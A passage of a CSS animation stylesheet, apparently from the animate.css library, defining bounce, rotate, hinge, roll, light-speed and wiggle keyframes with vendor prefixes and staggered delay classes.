-webkit-transform: scale(.9); } 100% { -webkit-transform: scale(1); } } @-moz-keyframes bounceIn { 0% { opacity: 0; -moz-transform: scale(.3); } 50% { opacity: 1; -moz-transform: scale(1.05); } 70% { -moz-transform: scale(.9); } 100% { -moz-transform: scale(1); } } @-o-keyframes bounceIn { 0% { opacity: 0; -o-transform: scale(.3); } 50% { opacity: 1; -o-transform: scale(1.05); } 70% { -o-transform: scale(.9); } 100% { -o-transform: scale(1); } } @keyframes bounceIn { 0% { opacity: 0; transform: scale(.3); } 50% { opacity: 1; transform: scale(1.05); } 70% { transform: scale(.9); } 100% { transform: scale(1); } } .bounceIn { -webkit-animation-name: bounceIn; -moz-animation-name: bounceIn; -o-animation-name: bounceIn; animation-name: bounceIn; } @-webkit-keyframes bounceInUp { 0% { opacity: 0; -webkit-transform: translateY(2000px); } 60% { opacity: 1; -webkit-transform: translateY(-30px); } 80% { -webkit-transform: translateY(10px); } 100% { -webkit-transform: translateY(0); } } @-moz-keyframes bounceInUp { 0% { opacity: 0; -moz-transform: translateY(2000px); } 60% { opacity: 1; -moz-transform: translateY(-30px); } 80% { -moz-transform: translateY(10px); } 100% { -moz-transform: translateY(0); } } @-o-keyframes bounceInUp { 0% { opacity: 0; -o-transform: translateY(2000px); } 60% { opacity: 1; -o-transform: translateY(-30px); } 80% { -o-transform: translateY(10px); } 100% { -o-transform: translateY(0); } } @keyframes bounceInUp { 0% { opacity: 0; transform: translateY(2000px); } 60% { opacity: 1; transform: translateY(-30px); } 80% { transform: translateY(10px); } 100% { transform: translateY(0); } } .bounceInUp { -webkit-animation-name: bounceInUp; -moz-animation-name: bounceInUp; -o-animation-name: bounceInUp; animation-name: bounceInUp; } @-webkit-keyframes bounceInDown { 0% { opacity: 0; -webkit-transform: translateY(-2000px); } 60% { opacity: 1; -webkit-transform: translateY(30px); } 80% { -webkit-transform: translateY(-10px); } 100% { -webkit-transform: translateY(0); } } @-moz-keyframes bounceInDown { 0% { opacity: 0; -moz-transform: translateY(-2000px); } 60% { opacity: 1; -moz-transform: translateY(30px); } 80% { -moz-transform: translateY(-10px); } 100% { -moz-transform: translateY(0); } } @-o-keyframes bounceInDown { 0% { opacity: 0; -o-transform: translateY(-2000px); } 60% { opacity: 1; -o-transform: translateY(30px); } 80% { -o-transform: translateY(-10px); } 100% { -o-transform: translateY(0); } } @keyframes bounceInDown { 0% { opacity: 0; transform: translateY(-2000px); } 60% { opacity: 1; transform: translateY(30px); } 80% { transform: translateY(-10px); } 100% { transform: translateY(0); } } .bounceInDown { -webkit-animation-name: bounceInDown; -moz-animation-name: bounceInDown; -o-animation-name: bounceInDown; animation-name: bounceInDown; } @-webkit-keyframes bounceInLeft { 0% { opacity: 0; -webkit-transform: translateX(-2000px); } 60% { opacity: 1; -webkit-transform: translateX(30px); } 80% { -webkit-transform: translateX(-10px); } 100% { -webkit-transform: translateX(0); } } @-moz-keyframes bounceInLeft { 0% { opacity: 0; -moz-transform: translateX(-2000px); } 60% { opacity: 1; -moz-transform: translateX(30px); } 80% { -moz-transform: translateX(-10px); } 100% { -moz-transform: translateX(0); } } @-o-keyframes bounceInLeft { 0% { opacity: 0; -o-transform: translateX(-2000px); } 60% { opacity: 1; -o-transform: translateX(30px); } 80% { -o-transform: translateX(-10px); } 100% { -o-transform: translateX(0); } } @keyframes bounceInLeft { 0% { opacity: 0; transform: translateX(-2000px); } 60% { opacity: 1; transform: translateX(30px); } 80% { transform: translateX(-10px); } 100% { transform: translateX(0); } } .bounceInLeft { -webkit-animation-name: bounceInLeft; -moz-animation-name: bounceInLeft; -o-animation-name: bounceInLeft; animation-name: bounceInLeft; } @-webkit-keyframes bounceInRight { 0% { opacity: 0; -webkit-transform: translateX(2000px); } 60% { opacity: 1; -webkit-transform: translateX(-30px); } 80% { -webkit-transform: translateX(10px); } 100% { -webkit-transform: translateX(0); } } @-moz-keyframes bounceInRight { 0% { opacity: 0; -moz-transform: translateX(2000px); } 60% { opacity: 1; -moz-transform: translateX(-30px); } 80% { -moz-transform: translateX(10px); } 100% { -moz-transform: translateX(0); } } @-o-keyframes bounceInRight { 0% { opacity: 0; -o-transform: translateX(2000px); } 60% { opacity: 1; -o-transform: translateX(-30px); } 80% { -o-transform: translateX(10px); } 100% { -o-transform: translateX(0); } } @keyframes bounceInRight { 0% { opacity: 0; transform: translateX(2000px); } 60% { opacity: 1; transform: translateX(-30px); } 80% { transform: translateX(10px); } 100% { transform: translateX(0); } } .bounceInRight { -webkit-animation-name: bounceInRight; -moz-animation-name: bounceInRight; -o-animation-name: bounceInRight; animation-name: bounceInRight; } @-webkit-keyframes bounceOut { 0% { -webkit-transform: scale(1); } 25% { -webkit-transform: scale(.95); } 50% { opacity: 1; -webkit-transform: scale(1.1); } 100% { opacity: 0; -webkit-transform: scale(.3); } } @-moz-keyframes bounceOut { 0% { -moz-transform: scale(1); } 25% { -moz-transform: scale(.95); } 50% { opacity: 1; -moz-transform: scale(1.1); } 100% { opacity: 0; -moz-transform: scale(.3); } } @-o-keyframes bounceOut { 0% { -o-transform: scale(1); } 25% { -o-transform: scale(.95); } 50% { opacity: 1; -o-transform: scale(1.1); } 100% { opacity: 0; -o-transform: scale(.3); } } @keyframes bounceOut { 0% { transform: scale(1); } 25% { transform: scale(.95); } 50% { opacity: 1; transform: scale(1.1); } 100% { opacity: 0; transform: scale(.3); } } .bounceOut { -webkit-animation-name: bounceOut; -moz-animation-name: bounceOut; -o-animation-name: bounceOut; animation-name: bounceOut; } @-webkit-keyframes bounceOutUp { 0% { -webkit-transform: translateY(0); } 20% { opacity: 1; -webkit-transform: translateY(20px); } 100% { opacity: 0; -webkit-transform: translateY(-2000px); } } @-moz-keyframes bounceOutUp { 0% { -moz-transform: translateY(0); } 20% { opacity: 1; -moz-transform: translateY(20px); } 100% { opacity: 0; -moz-transform: translateY(-2000px); } } @-o-keyframes bounceOutUp { 0% { -o-transform: translateY(0); } 20% { opacity: 1; -o-transform: translateY(20px); } 100% { opacity: 0; -o-transform: translateY(-2000px); } } @keyframes bounceOutUp { 0% { transform: translateY(0); } 20% { opacity: 1; transform: translateY(20px); } 100% { opacity: 0; transform: translateY(-2000px); } } .bounceOutUp { -webkit-animation-name: bounceOutUp; -moz-animation-name: bounceOutUp; -o-animation-name: bounceOutUp; animation-name: bounceOutUp; } @-webkit-keyframes bounceOutDown { 0% { -webkit-transform: translateY(0); } 20% { opacity: 1; -webkit-transform: translateY(-20px); } 100% { opacity: 0; -webkit-transform: translateY(2000px); } } @-moz-keyframes bounceOutDown { 0% { -moz-transform: translateY(0); } 20% { opacity: 1; -moz-transform: translateY(-20px); } 100% { opacity: 0; -moz-transform: translateY(2000px); } } @-o-keyframes bounceOutDown { 0% { -o-transform: translateY(0); } 20% { opacity: 1; -o-transform: translateY(-20px); } 100% { opacity: 0; -o-transform: translateY(2000px); } } @keyframes bounceOutDown { 0% { transform: translateY(0); } 20% { opacity: 1; transform: translateY(-20px); } 100% { opacity: 0; transform: translateY(2000px); } } .bounceOutDown { -webkit-animation-name: bounceOutDown; -moz-animation-name: bounceOutDown; -o-animation-name: bounceOutDown; animation-name: bounceOutDown; } @-webkit-keyframes bounceOutLeft { 0% { -webkit-transform: translateX(0); } 20% { opacity: 1; -webkit-transform: translateX(20px); } 100% { opacity: 0; -webkit-transform: translateX(-2000px); } } @-moz-keyframes bounceOutLeft { 0% { -moz-transform: translateX(0); } 20% { opacity: 1; -moz-transform: translateX(20px); } 100% { opacity: 0; -moz-transform: translateX(-2000px); } } @-o-keyframes bounceOutLeft { 0% { -o-transform: translateX(0); } 20% { opacity: 1; -o-transform: translateX(20px); } 100% { opacity: 0; -o-transform: translateX(-2000px); } } @keyframes bounceOutLeft { 0% { transform: translateX(0); } 20% { opacity: 1; transform: translateX(20px); } 100% { opacity: 0; transform: translateX(-2000px); } } .bounceOutLeft { -webkit-animation-name: bounceOutLeft; -moz-animation-name: bounceOutLeft; -o-animation-name: bounceOutLeft; animation-name: bounceOutLeft; } @-webkit-keyframes bounceOutRight { 0% { -webkit-transform: translateX(0); } 20% { opacity: 1; -webkit-transform: translateX(-20px); } 100% { opacity: 0; -webkit-transform: translateX(2000px); } } @-moz-keyframes bounceOutRight { 0% { -moz-transform: translateX(0); } 20% { opacity: 1; -moz-transform: translateX(-20px); } 100% { opacity: 0; -moz-transform: translateX(2000px); } } @-o-keyframes bounceOutRight { 0% { -o-transform: translateX(0); } 20% { opacity: 1; -o-transform: translateX(-20px); } 100% { opacity: 0; -o-transform: translateX(2000px); } } @keyframes bounceOutRight { 0% { transform: translateX(0); } 20% { opacity: 1; transform: translateX(-20px); } 100% { opacity: 0; transform: translateX(2000px); } } .bounceOutRight { -webkit-animation-name: bounceOutRight; -moz-animation-name: bounceOutRight; -o-animation-name: bounceOutRight; animation-name: bounceOutRight; } @-webkit-keyframes rotateIn { 0% { -webkit-transform-origin: center center; -webkit-transform: rotate(-200deg); opacity: 0; } 100% { -webkit-transform-origin: center center; -webkit-transform: rotate(0); opacity: 1; } } @-moz-keyframes rotateIn { 0% { -moz-transform-origin: center center; -moz-transform: rotate(-200deg); opacity: 0; } 100% { -moz-transform-origin: center center; -moz-transform: rotate(0); opacity: 1; } } @-o-keyframes rotateIn { 0% { -o-transform-origin: center center; -o-transform: rotate(-200deg); opacity: 0; } 100% { -o-transform-origin: center center; -o-transform: rotate(0); opacity: 1; } } @keyframes rotateIn { 0% { transform-origin: center center; transform: rotate(-200deg); opacity: 0; } 100% { transform-origin: center center; transform: rotate(0); opacity: 1; } } .rotateIn { -webkit-animation-name: rotateIn; -moz-animation-name: rotateIn; -o-animation-name: rotateIn; animation-name: rotateIn; } @-webkit-keyframes rotateInUpLeft { 0% { -webkit-transform-origin: left bottom; -webkit-transform: rotate(90deg); opacity: 0; } 100% { -webkit-transform-origin: left bottom; -webkit-transform: rotate(0); opacity: 1; } } @-moz-keyframes rotateInUpLeft { 0% { -moz-transform-origin: left bottom; -moz-transform: rotate(90deg); opacity: 0; } 100% { -moz-transform-origin: left bottom; -moz-transform: rotate(0); opacity: 1; } } @-o-keyframes rotateInUpLeft { 0% { -o-transform-origin: left bottom; -o-transform: rotate(90deg); opacity: 0; } 100% { -o-transform-origin: left bottom; -o-transform: rotate(0); opacity: 1; } } @keyframes rotateInUpLeft { 0% { transform-origin: left bottom; transform: rotate(90deg); opacity: 0; } 100% { transform-origin: left bottom; transform: rotate(0); opacity: 1; } } .rotateInUpLeft { -webkit-animation-name: rotateInUpLeft; -moz-animation-name: rotateInUpLeft; -o-animation-name: rotateInUpLeft; animation-name: rotateInUpLeft; } @-webkit-keyframes rotateInDownLeft { 0% { -webkit-transform-origin: left bottom; -webkit-transform: rotate(-90deg); opacity: 0; } 100% { -webkit-transform-origin: left bottom; -webkit-transform: rotate(0); opacity: 1; } } @-moz-keyframes rotateInDownLeft { 0% { -moz-transform-origin: left bottom; -moz-transform: rotate(-90deg); opacity: 0; } 100% { -moz-transform-origin: left bottom; -moz-transform: rotate(0); opacity: 1; } } @-o-keyframes rotateInDownLeft { 0% { -o-transform-origin: left bottom; -o-transform: rotate(-90deg); opacity: 0; } 100% { -o-transform-origin: left bottom; -o-transform: rotate(0); opacity: 1; } } @keyframes rotateInDownLeft { 0% { transform-origin: left bottom; transform: rotate(-90deg); opacity: 0; } 100% { transform-origin: left bottom; transform: rotate(0); opacity: 1; } } .rotateInDownLeft { -webkit-animation-name: rotateInDownLeft; -moz-animation-name: rotateInDownLeft; -o-animation-name: rotateInDownLeft; animation-name: rotateInDownLeft; } @-webkit-keyframes rotateInUpRight { 0% { -webkit-transform-origin: right bottom; -webkit-transform: rotate(-90deg); opacity: 0; } 100% { -webkit-transform-origin: right bottom; -webkit-transform: rotate(0); opacity: 1; } } @-moz-keyframes rotateInUpRight { 0% { -moz-transform-origin: right bottom; -moz-transform: rotate(-90deg); opacity: 0; } 100% { -moz-transform-origin: right bottom; -moz-transform: rotate(0); opacity: 1; } } @-o-keyframes rotateInUpRight { 0% { -o-transform-origin: right bottom; -o-transform: rotate(-90deg); opacity: 0; } 100% { -o-transform-origin: right bottom; -o-transform: rotate(0); opacity: 1; } } @keyframes rotateInUpRight { 0% { transform-origin: right bottom; transform: rotate(-90deg); opacity: 0; } 100% { transform-origin: right bottom; transform: rotate(0); opacity: 1; } } .rotateInUpRight { -webkit-animation-name: rotateInUpRight; -moz-animation-name: rotateInUpRight; -o-animation-name: rotateInUpRight; animation-name: rotateInUpRight; } @-webkit-keyframes rotateInDownRight { 0% { -webkit-transform-origin: right bottom; -webkit-transform: rotate(90deg); opacity: 0; } 100% { -webkit-transform-origin: right bottom; -webkit-transform: rotate(0); opacity: 1; } } @-moz-keyframes rotateInDownRight { 0% { -moz-transform-origin: right bottom; -moz-transform: rotate(90deg); opacity: 0; } 100% { -moz-transform-origin: right bottom; -moz-transform: rotate(0); opacity: 1; } } @-o-keyframes rotateInDownRight { 0% { -o-transform-origin: right bottom; -o-transform: rotate(90deg); opacity: 0; } 100% { -o-transform-origin: right bottom; -o-transform: rotate(0); opacity: 1; } } @keyframes rotateInDownRight { 0% { transform-origin: right bottom; transform: rotate(90deg); opacity: 0; } 100% { transform-origin: right bottom; transform: rotate(0); opacity: 1; } } .rotateInDownRight { -webkit-animation-name: rotateInDownRight; -moz-animation-name: rotateInDownRight; -o-animation-name: rotateInDownRight; animation-name: rotateInDownRight; } @-webkit-keyframes rotateOut { 0% { -webkit-transform-origin: center center; -webkit-transform: rotate(0); opacity: 1; } 100% { -webkit-transform-origin: center center; -webkit-transform: rotate(200deg); opacity: 0; } } @-moz-keyframes rotateOut { 0% { -moz-transform-origin: center center; -moz-transform: rotate(0); opacity: 1; } 100% { -moz-transform-origin: center center; -moz-transform: rotate(200deg); opacity: 0; } } @-o-keyframes rotateOut { 0% { -o-transform-origin: center center; -o-transform: rotate(0); opacity: 1; } 100% { -o-transform-origin: center center; -o-transform: rotate(200deg); opacity: 0; } } @keyframes rotateOut { 0% { transform-origin: center center; transform: rotate(0); opacity: 1; } 100% { transform-origin: center center; transform: rotate(200deg); opacity: 0; } } .rotateOut { -webkit-animation-name: rotateOut; -moz-animation-name: rotateOut; -o-animation-name: rotateOut; animation-name: rotateOut; } @-webkit-keyframes rotateOutUpLeft { 0% { -webkit-transform-origin: left bottom; -webkit-transform: rotate(0); opacity: 1; } 100% { -webkit-transform-origin: left bottom; -webkit-transform: rotate(-90deg); opacity: 0; } } @-moz-keyframes rotateOutUpLeft { 0% { -moz-transform-origin: left bottom; -moz-transform: rotate(0); opacity: 1; } 100% { -moz-transform-origin: left bottom; -moz-transform: rotate(-90deg); opacity: 0; } } @-o-keyframes rotateOutUpLeft { 0% { -o-transform-origin: left bottom; -o-transform: rotate(0); opacity: 1; } 100% { -o-transform-origin: left bottom; -o-transform: rotate(-90deg); opacity: 0; } } @keyframes rotateOutUpLeft { 0% { transform-origin: left bottom; transform: rotate(0); opacity: 1; } 100% { -transform-origin: left bottom; -transform: rotate(-90deg); opacity: 0; } } .rotateOutUpLeft { -webkit-animation-name: rotateOutUpLeft; -moz-animation-name: rotateOutUpLeft; -o-animation-name: rotateOutUpLeft; animation-name: rotateOutUpLeft; } @-webkit-keyframes rotateOutDownLeft { 0% { -webkit-transform-origin: left bottom; -webkit-transform: rotate(0); opacity: 1; } 100% { -webkit-transform-origin: left bottom; -webkit-transform: rotate(90deg); opacity: 0; } } @-moz-keyframes rotateOutDownLeft { 0% { -moz-transform-origin: left bottom; -moz-transform: rotate(0); opacity: 1; } 100% { -moz-transform-origin: left bottom; -moz-transform: rotate(90deg); opacity: 0; } } @-o-keyframes rotateOutDownLeft { 0% { -o-transform-origin: left bottom; -o-transform: rotate(0); opacity: 1; } 100% { -o-transform-origin: left bottom; -o-transform: rotate(90deg); opacity: 0; } } @keyframes rotateOutDownLeft { 0% { transform-origin: left bottom; transform: rotate(0); opacity: 1; } 100% { transform-origin: left bottom; transform: rotate(90deg); opacity: 0; } } .rotateOutDownLeft { -webkit-animation-name: rotateOutDownLeft; -moz-animation-name: rotateOutDownLeft; -o-animation-name: rotateOutDownLeft; animation-name: rotateOutDownLeft; } @-webkit-keyframes rotateOutUpRight { 0% { -webkit-transform-origin: right bottom; -webkit-transform: rotate(0); opacity: 1; } 100% { -webkit-transform-origin: right bottom; -webkit-transform: rotate(90deg); opacity: 0; } } @-moz-keyframes rotateOutUpRight { 0% { -moz-transform-origin: right bottom; -moz-transform: rotate(0); opacity: 1; } 100% { -moz-transform-origin: right bottom; -moz-transform: rotate(90deg); opacity: 0; } } @-o-keyframes rotateOutUpRight { 0% { -o-transform-origin: right bottom; -o-transform: rotate(0); opacity: 1; } 100% { -o-transform-origin: right bottom; -o-transform: rotate(90deg); opacity: 0; } } @keyframes rotateOutUpRight { 0% { transform-origin: right bottom; transform: rotate(0); opacity: 1; } 100% { transform-origin: right bottom; transform: rotate(90deg); opacity: 0; } } .rotateOutUpRight { -webkit-animation-name: rotateOutUpRight; -moz-animation-name: rotateOutUpRight; -o-animation-name: rotateOutUpRight; animation-name: rotateOutUpRight; } @-webkit-keyframes rotateOutDownRight { 0% { -webkit-transform-origin: right bottom; -webkit-transform: rotate(0); opacity: 1; } 100% { -webkit-transform-origin: right bottom; -webkit-transform: rotate(-90deg); opacity: 0; } } @-moz-keyframes rotateOutDownRight { 0% { -moz-transform-origin: right bottom; -moz-transform: rotate(0); opacity: 1; } 100% { -moz-transform-origin: right bottom; -moz-transform: rotate(-90deg); opacity: 0; } } @-o-keyframes rotateOutDownRight { 0% { -o-transform-origin: right bottom; -o-transform: rotate(0); opacity: 1; } 100% { -o-transform-origin: right bottom; -o-transform: rotate(-90deg); opacity: 0; } } @keyframes rotateOutDownRight { 0% { transform-origin: right bottom; transform: rotate(0); opacity: 1; } 100% { transform-origin: right bottom; transform: rotate(-90deg); opacity: 0; } } .rotateOutDownRight { -webkit-animation-name: rotateOutDownRight; -moz-animation-name: rotateOutDownRight; -o-animation-name: rotateOutDownRight; animation-name: rotateOutDownRight; } @-webkit-keyframes hinge { 0% { -webkit-transform: rotate(0); -webkit-transform-origin: top left; -webkit-animation-timing-function: ease-in-out; } 20%, 60% { -webkit-transform: rotate(80deg); -webkit-transform-origin: top left; -webkit-animation-timing-function: ease-in-out; } 40% { -webkit-transform: rotate(60deg); -webkit-transform-origin: top left; -webkit-animation-timing-function: ease-in-out; } 80% { -webkit-transform: rotate(60deg) translateY(0); opacity: 1; -webkit-transform-origin: top left; -webkit-animation-timing-function: ease-in-out; } 100% { -webkit-transform: translateY(700px); opacity: 0; } } @-moz-keyframes hinge { 0% { -moz-transform: rotate(0); -moz-transform-origin: top left; -moz-animation-timing-function: ease-in-out; } 20%, 60% { -moz-transform: rotate(80deg); -moz-transform-origin: top left; -moz-animation-timing-function: ease-in-out; } 40% { -moz-transform: rotate(60deg); -moz-transform-origin: top left; -moz-animation-timing-function: ease-in-out; } 80% { -moz-transform: rotate(60deg) translateY(0); opacity: 1; -moz-transform-origin: top left; -moz-animation-timing-function: ease-in-out; } 100% { -moz-transform: translateY(700px); opacity: 0; } } @-o-keyframes hinge { 0% { -o-transform: rotate(0); -o-transform-origin: top left; -o-animation-timing-function: ease-in-out; } 20%, 60% { -o-transform: rotate(80deg); -o-transform-origin: top left; -o-animation-timing-function: ease-in-out; } 40% { -o-transform: rotate(60deg); -o-transform-origin: top left; -o-animation-timing-function: ease-in-out; } 80% { -o-transform: rotate(60deg) translateY(0); opacity: 1; -o-transform-origin: top left; -o-animation-timing-function: ease-in-out; } 100% { -o-transform: translateY(700px); opacity: 0; } } @keyframes hinge { 0% { transform: rotate(0); transform-origin: top left; animation-timing-function: ease-in-out; } 20%, 60% { transform: rotate(80deg); transform-origin: top left; animation-timing-function: ease-in-out; } 40% { transform: rotate(60deg); transform-origin: top left; animation-timing-function: ease-in-out; } 80% { transform: rotate(60deg) translateY(0); opacity: 1; transform-origin: top left; animation-timing-function: ease-in-out; } 100% { transform: translateY(700px); opacity: 0; } } .hinge { -webkit-animation-name: hinge; -moz-animation-name: hinge; -o-animation-name: hinge; animation-name: hinge; } /* originally authored by Nick Pettit - https://github.com/nickpettit/glide */ @-webkit-keyframes rollIn { 0% { opacity: 0; -webkit-transform: translateX(-100%) rotate(-120deg); } 100% { opacity: 1; -webkit-transform: translateX(0px) rotate(0deg); } } @-moz-keyframes rollIn { 0% { opacity: 0; -moz-transform: translateX(-100%) rotate(-120deg); } 100% { opacity: 1; -moz-transform: translateX(0px) rotate(0deg); } } @-o-keyframes rollIn { 0% { opacity: 0; -o-transform: translateX(-100%) rotate(-120deg); } 100% { opacity: 1; -o-transform: translateX(0px) rotate(0deg); } } @keyframes rollIn { 0% { opacity: 0; transform: translateX(-100%) rotate(-120deg); } 100% { opacity: 1; transform: translateX(0px) rotate(0deg); } } .rollIn { -webkit-animation-name: rollIn; -moz-animation-name: rollIn; -o-animation-name: rollIn; animation-name: rollIn; } /* originally authored by Nick Pettit - https://github.com/nickpettit/glide */ @-webkit-keyframes rollOut { 0% { opacity: 1; -webkit-transform: translateX(0px) rotate(0deg); } 100% { opacity: 0; -webkit-transform: translateX(100%) rotate(120deg); } } @-moz-keyframes rollOut { 0% { opacity: 1; -moz-transform: translateX(0px) rotate(0deg); } 100% { opacity: 0; -moz-transform: translateX(100%) rotate(120deg); } } @-o-keyframes rollOut { 0% { opacity: 1; -o-transform: translateX(0px) rotate(0deg); } 100% { opacity: 0; -o-transform: translateX(100%) rotate(120deg); } } @keyframes rollOut { 0% { opacity: 1; transform: translateX(0px) rotate(0deg); } 100% { opacity: 0; transform: translateX(100%) rotate(120deg); } } .rollOut { -webkit-animation-name: rollOut; -moz-animation-name: rollOut; -o-animation-name: rollOut; animation-name: rollOut; } /* originally authored by Angelo Rohit - https://github.com/angelorohit */ @-webkit-keyframes lightSpeedIn { 0% { -webkit-transform: translateX(100%) skewX(-30deg); opacity: 0; } 60% { -webkit-transform: translateX(-20%) skewX(30deg); opacity: 1; } 80% { -webkit-transform: translateX(0%) skewX(-15deg); opacity: 1; } 100% { -webkit-transform: translateX(0%) skewX(0deg); opacity: 1; } } @-moz-keyframes lightSpeedIn { 0% { -moz-transform: translateX(100%) skewX(-30deg); opacity: 0; } 60% { -moz-transform: translateX(-20%) skewX(30deg); opacity: 1; } 80% { -moz-transform: translateX(0%) skewX(-15deg); opacity: 1; } 100% { -moz-transform: translateX(0%) skewX(0deg); opacity: 1; } } @-o-keyframes lightSpeedIn { 0% { -o-transform: translateX(100%) skewX(-30deg); opacity: 0; } 60% { -o-transform: translateX(-20%) skewX(30deg); opacity: 1; } 80% { -o-transform: translateX(0%) skewX(-15deg); opacity: 1; } 100% { -o-transform: translateX(0%) skewX(0deg); opacity: 1; } } @keyframes lightSpeedIn { 0% { transform: translateX(100%) skewX(-30deg); opacity: 0; } 60% { transform: translateX(-20%) skewX(30deg); opacity: 1; } 80% { transform: translateX(0%) skewX(-15deg); opacity: 1; } 100% { transform: translateX(0%) skewX(0deg); opacity: 1; } } .lightSpeedIn { -webkit-animation-name: lightSpeedIn; -moz-animation-name: lightSpeedIn; -o-animation-name: lightSpeedIn; animation-name: lightSpeedIn; -webkit-animation-timing-function: ease-out; -moz-animation-timing-function: ease-out; -o-animation-timing-function: ease-out; animation-timing-function: ease-out; } .animated.lightSpeedIn { -webkit-animation-duration: 0.5s; -moz-animation-duration: 0.5s; -o-animation-duration: 0.5s; animation-duration: 0.5s; } /* originally authored by Angelo Rohit - https://github.com/angelorohit */ @-webkit-keyframes lightSpeedOut { 0% { -webkit-transform: translateX(0%) skewX(0deg); opacity: 1; } 100% { -webkit-transform: translateX(100%) skewX(-30deg); opacity: 0; } } @-moz-keyframes lightSpeedOut { 0% { -moz-transform: translateX(0%) skewX(0deg); opacity: 1; } 100% { -moz-transform: translateX(100%) skewX(-30deg); opacity: 0; } } @-o-keyframes lightSpeedOut { 0% { -o-transform: translateX(0%) skewX(0deg); opacity: 1; } 100% { -o-transform: translateX(100%) skewX(-30deg); opacity: 0; } } @keyframes lightSpeedOut { 0% { transform: translateX(0%) skewX(0deg); opacity: 1; } 100% { transform: translateX(100%) skewX(-30deg); opacity: 0; } } .lightSpeedOut { -webkit-animation-name: lightSpeedOut; -moz-animation-name: lightSpeedOut; -o-animation-name: lightSpeedOut; animation-name: lightSpeedOut; -webkit-animation-timing-function: ease-in; -moz-animation-timing-function: ease-in; -o-animation-timing-function: ease-in; animation-timing-function: ease-in; } .animated.lightSpeedOut { -webkit-animation-duration: 0.25s; -moz-animation-duration: 0.25s; -o-animation-duration: 0.25s; animation-duration: 0.25s; } /* originally authored by Angelo Rohit - https://github.com/angelorohit */ @-webkit-keyframes wiggle { 0% { -webkit-transform: skewX(9deg); } 10% { -webkit-transform: skewX(-8deg); } 20% { -webkit-transform: skewX(7deg); } 30% { -webkit-transform: skewX(-6deg); } 40% { -webkit-transform: skewX(5deg); } 50% { -webkit-transform: skewX(-4deg); } 60% { -webkit-transform: skewX(3deg); } 70% { -webkit-transform: skewX(-2deg); } 80% { -webkit-transform: skewX(1deg); } 90% { -webkit-transform: skewX(0deg); } 100% { -webkit-transform: skewX(0deg); } } @-moz-keyframes wiggle { 0% { -moz-transform: skewX(9deg); } 10% { -moz-transform: skewX(-8deg); } 20% { -moz-transform: skewX(7deg); } 30% { -moz-transform: skewX(-6deg); } 40% { -moz-transform: skewX(5deg); } 50% { -moz-transform: skewX(-4deg); } 60% { -moz-transform: skewX(3deg); } 70% { -moz-transform: skewX(-2deg); } 80% { -moz-transform: skewX(1deg); } 90% { -moz-transform: skewX(0deg); } 100% { -moz-transform: skewX(0deg); } } @-o-keyframes wiggle { 0% { -o-transform: skewX(9deg); } 10% { -o-transform: skewX(-8deg); } 20% { -o-transform: skewX(7deg); } 30% { -o-transform: skewX(-6deg); } 40% { -o-transform: skewX(5deg); } 50% { -o-transform: skewX(-4deg); } 60% { -o-transform: skewX(3deg); } 70% { -o-transform: skewX(-2deg); } 80% { -o-transform: skewX(1deg); } 90% { -o-transform: skewX(0deg); } 100% { -o-transform: skewX(0deg); } } @keyframes wiggle { 0% { transform: skewX(9deg); } 10% { transform: skewX(-8deg); } 20% { transform: skewX(7deg); } 30% { transform: skewX(-6deg); } 40% { transform: skewX(5deg); } 50% { transform: skewX(-4deg); } 60% { transform: skewX(3deg); } 70% { transform: skewX(-2deg); } 80% { transform: skewX(1deg); } 90% { transform: skewX(0deg); } 100% { transform: skewX(0deg); } } .wiggle { -webkit-animation-name: wiggle; -moz-animation-name: wiggle; -o-animation-name: wiggle; animation-name: wiggle; -webkit-animation-timing-function: ease-in; -moz-animation-timing-function: ease-in; -o-animation-timing-function: ease-in; animation-timing-function: ease-in; } .animated.wiggle { -webkit-animation-duration: 0.75s; -moz-animation-duration: 0.75s; -o-animation-duration: 0.75s; animation-duration: 0.75s; } .animate0{ -webkit-animation-duration: .6s; -webkit-animation-delay: 0s; -webkit-animation-timing-function: ease; -webkit-animation-fill-mode: both; -moz-animation-duration: .6s; -moz-animation-delay: 0s; -moz-animation-timing-function: ease; -moz-animation-fill-mode: both; -ms-animation-duration: .6s; -ms-animation-delay: 0s; -ms-animation-timing-function: ease; -ms-animation-fill-mode: both; animation-duration: .6s; animation-delay: 0s; animation-timing-function: ease; animation-fill-mode: both; } .animate1{ -webkit-animation-duration: .6s; -webkit-animation-delay: .2s; -webkit-animation-timing-function: ease; -webkit-animation-fill-mode: both; -moz-animation-duration: .6s; -moz-animation-delay: .2s; -moz-animation-timing-function: ease; -moz-animation-fill-mode: both; -ms-animation-duration: .6s; -ms-animation-delay: .2s; -ms-animation-timing-function: ease; -ms-animation-fill-mode: both; animation-duration: .6s; animation-delay: .2s; animation-timing-function: ease; animation-fill-mode: both; } .animate2{ -webkit-animation-duration: .6s; -webkit-animation-delay: .4s; -webkit-animation-timing-function: ease; -webkit-animation-fill-mode: both; -moz-animation-duration: .6s; -moz-animation-delay: .4s; -moz-animation-timing-function: ease; -moz-animation-fill-mode: both; -ms-animation-duration: .6s; -ms-animation-delay: .4s; -ms-animation-timing-function: ease; -ms-animation-fill-mode: both; animation-duration: .6s; animation-delay: .4s; animation-timing-function: ease; animation-fill-mode: both; } .animate3{ -webkit-animation-duration: .6s; -webkit-animation-delay: .6s; -webkit-animation-timing-function: ease; -webkit-animation-fill-mode: both; -moz-animation-duration: .6s; -moz-animation-delay: .6s; -moz-animation-timing-function: ease; -moz-animation-fill-mode: both; -ms-animation-duration: .6s; -ms-animation-delay: .6s; -ms-animation-timing-function: ease; -ms-animation-fill-mode: both; animation-duration: .6s; animation-delay: .6s; animation-timing-function: ease; animation-fill-mode: both; } .animate4{ -webkit-animation-duration: .6s; -webkit-animation-delay: .8s; -webkit-animation-timing-function: ease; -webkit-animation-fill-mode: both; -moz-animation-duration: .6s; -moz-animation-delay: .8s; -moz-animation-timing-function: ease; -moz-animation-fill-mode: both; -ms-animation-duration: .6s; -ms-animation-delay: .8s; -ms-animation-timing-function: ease; -ms-animation-fill-mode: both; animation-duration: .6s; animation-delay: .8s; animation-timing-function: ease; animation-fill-mode: both; } .animate5{ -webkit-animation-duration: .6s; -webkit-animation-delay: 1s; -webkit-animation-timing-function: ease; -webkit-animation-fill-mode: both; -moz-animation-duration: .6s; -moz-animation-delay: 1s; -moz-animation-timing-function: ease; -moz-animation-fill-mode: both; -ms-animation-duration: .6s; -ms-animation-delay: 1s; -ms-animation-timing-function: ease; -ms-animation-fill-mode: both; animation-duration: .6s; animation-delay: 1s; animation-timing-function: ease; animation-fill-mode: both; } .animate6{ -webkit-animation-duration: .6s; -webkit-animation-delay: 1.2s; -webkit-animation-timing-function: ease; -webkit-animation-fill-mode: both; -moz-animation-duration: .6s; -moz-animation-delay: 